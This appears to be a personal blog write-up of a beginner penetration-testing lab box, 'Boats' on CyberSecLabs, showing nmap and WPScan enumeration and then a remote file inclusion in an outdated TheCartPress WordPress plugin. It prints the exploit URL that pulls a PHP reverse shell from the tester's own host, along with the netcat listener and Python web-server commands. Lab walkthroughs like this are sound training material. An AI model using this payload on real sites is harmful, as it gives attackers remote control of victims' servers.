This is my third write up and I will be discussing my experience with the machine “Boats” from CyberSecLabs. CyberSecLabs is a great platform, for people who are starting out with penetration testing. Shares was a pretty easy Windows box. A WordPress plugin thecartpress was found vulnerable leading to a Remote File Inclusion(RFI).

lil boat

Step 1: Enumeration

Kicked off with a Nmap scan and jumped right in. My first scan used default scripts -sC and version detection -sV. The second scan pretty much gave me similar results.

sudo nmap -sC -sV 172.31.1.14

I always start from top to bottom when looking into my ports and reading my results. I visited the webpage and ran some web enumeration scans and found nothing interesting. Going back to my Nmap scan results the WordPress version 4.0.1 caught my attention. I ran WPScan which is a great tool baked into Kali that scans for WordPress vulnerabilities.

sudo wpscan -- url http://172.31.1.14/

Looking at my scan results I noticed that the thecartpress plugin was outdated.

Step 2: Exploitation

I then googled the plugin name thecartpress along with the word exploit and bam!

Looking at the exploit I appended this path to the URL http://172.31.1.14/

/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=RFI

I noticed the error presenting the Remote File Inclusion(RFI).

My focus was beamed on the variable tcp_class_path in our URL because this is where I would make a call to the file we want to grab off our machine and run.

Well, I know this machine runs PHP on Windows so I googled for a windows php reverse shell and found this bad boy on GitHub.

Cloned the shell onto my machine and opened up the file with Vim and changed the IP to the one assigned to my tun0 adapter.

You can also change the port if you want.

Next, I needed to get netcat running to receive an incoming connection from the shell and python simple server so I could serve up my shell. You need to make sure that when you serve up the shell file that it is in the same directory you run the python simple server from.

First terminal window:

nc -lvp 1234

Second Terminal Window:

sudo python -m SimpleHTTPServer 80

Example:

I then took the URL path we gathered from the exploit appending http://10.10.0.6/sinnershell.php to the tcp_class_path which made a call to my python simple server running the file.

http://172.31.1.14/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://10.10.0.6/sinnershell.php

Going back to my Kali box my netcat presented the reverse connection giving me access to the victim machine as Admin.

Web App Pen Tester 🦇 | https://github.com/SoftwareSinner